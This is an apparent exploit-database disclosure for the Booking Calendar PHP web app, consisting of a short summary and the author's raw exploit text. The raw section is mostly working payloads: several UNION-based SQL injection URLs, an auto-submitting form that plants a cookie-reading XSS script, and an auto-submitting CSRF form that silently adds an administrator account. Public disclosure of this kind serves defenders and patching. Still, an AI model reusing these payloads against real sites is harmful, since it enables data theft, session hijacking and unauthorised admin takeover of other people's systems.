Booking Calendar PHP - Multiple Vulnerabilties

vendor:

Booking Calendar PHP

by:

AtT4CKxT3rR0r1ST

8,8

CVSS

HIGH

Multiple Sql Injection, Cross Site Scripting, Cross Site Request Forgery

89, 79, 352

CWE

Product Name: Booking Calendar PHP

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Booking Calendar PHP – Multiple Vulnerabilties

Multiple Sql Injection: An attacker can inject malicious SQL queries into the vulnerable web application. Cross Site Scripting: An attacker can inject malicious JavaScript code into the vulnerable web application. Cross Site Request Forgery: An attacker can send a malicious request to the vulnerable web application.

Mitigation:

Input validation, Encoding, Whitelisting, Token-based authentication, CSRF tokens, Captcha, etc.

Source

Exploit-DB raw data:

Booking Calendar PHP   - Multiple Vulnerabilties
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.sajt-trgovina.com/booking_calendar/
####################################################################

[1] Multiple Sql Injection
===========================

http://site/calendare/get_code.php?id=null'+and+1=2+union+select+1,2,version(),4,5,6---
http://site/calendare/read_answer.php?id=null+and+1=2+union+select+1,2,3,4,5,6,version(),8,9,10
http://site/calendare/edit_calendar.php?id=null'+and+1=2+union+select+1,version(),3,4,5,6---

[2] Cross Site Scripting
=========================

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/calendare/">
<input type="hidden" name="id_template" value="2"/>
<input type="hidden" name="name"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="save_new_calendar" value="Save new calendar"/>
</form>
</body>
</html>

[3] Cross Site Request Forgery
==============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/calendare/user_add.php
">
<input type="hidden" name="name" value="iphobos"/>
<input type="hidden" name="email" value="email@hotmail.com"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="user_add" value="Save changes"/>
</form>
</body>
</html>


####################################################################